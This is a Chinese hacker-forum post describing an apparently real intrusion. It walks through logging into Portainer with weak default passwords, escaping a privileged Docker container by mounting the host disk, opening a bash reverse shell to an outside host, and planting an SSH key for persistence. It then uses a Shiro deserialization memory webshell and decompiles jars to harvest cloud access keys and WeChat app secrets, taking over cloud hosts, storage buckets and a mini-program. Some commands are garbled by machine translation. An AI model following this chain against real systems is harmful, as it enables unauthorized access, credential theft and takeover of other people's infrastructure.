跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

记一次简单的Docker逃逸+反编译jar接管云主机

精选回复

发布于

## 1. 想法

````html

Portainer弱口令-Docker转义-写入SSH公钥shiro反序列化-注入内存木马-反编译jar-接管云主机

````

## 2. 简单的Docker 转义

### 1.Protainer弱密码

Portainer是操作docker常用的图形化工具。它重量轻且易于使用。然而,许多Portainer的密码都很弱,例如:portainer/portainer;管理员/12345678; portainer/12345678等。注意密码长度差不多8个字符.

### 2.特权模式转义

使用弱口令进入portainer后,尝试挂载根目录逃逸失败,随后又尝试从Docker中进行特权模式逃逸。

添加集装箱:tianjia.png

以特权模式运行容器:tequanmoshi.png

然后部署容器:bushurongqi.png

然后检查容器列表,确保容器正常运行:running.png

以root 身份输入容器:intorongqi.png

正常情况下很多命令不能使用:cantifconfig.png

首先查看当前磁盘分区情况并获取主机分区:

````bash

fdisk -l

``fdisk-l.png

获取主机磁盘为/dev/vda1

挂载主机磁盘:

````bash

mkdir li1u ----创建文件

mount /dev/vda1 /li1u/----挂载到文件

chroot /li1u/----在li1u根目录下运行

``mkdirli1u.png

### 3.反弹壳

尝试弹壳:

````bash

bash -i /dev/tcp/xxx/8000 01

````

反弹成功:rev-shell.png

### 4.写入SSH公钥

反弹shell成功后尝试写入ssh公钥维持小权限:lsssh.png

使用xshell生成用户密钥:shengcmiyao.png

然后点击属性-公钥,复制公钥内容:gongyaocontent.png

使用echo命令将公钥附加到authorized_keys:xieruyonggao.png

catauthorized_keys添加成功:zhuijiacg.png

尝试使用xshell连接(之前收集的信息显示ssh开放2021端口)

选择publickey(公钥登录)进行用户认证,通常用户名密码连接:gongyaolianjie.png

点击设置,选择刚刚生成的密钥,填写您设置的连接密码:lianjiesuccess.png

接下来是内网.

## 3.反编译jar并接管云主机

### 1.shiro反序列化-注意内存马

常规操作我就不多说了。输入冰蝎存储卡:image-20230917021346614.png

### 2.扩展结果(查找敏感信息)

连接后,尝试查找敏感信息:

早期收集的信息显示,目标是SpringBoot框架。 Spring的配置文件都是yml和properties。 Linux直接搜索指定后缀名的文件,并没有发现敏感信息。

````bash

查找/-名称*.yml .properties

````

### 3.反编译jar,获取大量配置信息

然后我转到网站根目录,在不同的文件夹下发现了三个jar包。它们应该全部打包到jar 中并运行。

直接将jar下载到本地电脑并反编译jar包:方法一:修改文件扩展名image-20230917022334656.png

修改jar扩展名为zip等,直接解压:image-20230917022418514.png

在clsses文件夹中,找到properties配置文件:image-20230917022436489.png

获取联系电话:image-20230917022544603.png

使用ak/sk应用工具或星云管理器导入云主机image-20230917025851808.png

OSS存储桶中发现大量敏感信息。

还有vx小程序的appid和secret,直接调用官方API即可:

````html

https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credentialappid=APPIDsecret=APPSECRET

````

还可以通过官方API获取小程序反馈、小程序用户访问数据、发送信息等,几乎可以接管小程序。方法二:jd-gui反编译jar

直接将jar包拖入jd-gui即可:同样的配置信息image-20230917023226923.png

9ef582612c6bce21e1c40f750925ff6.jpg

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。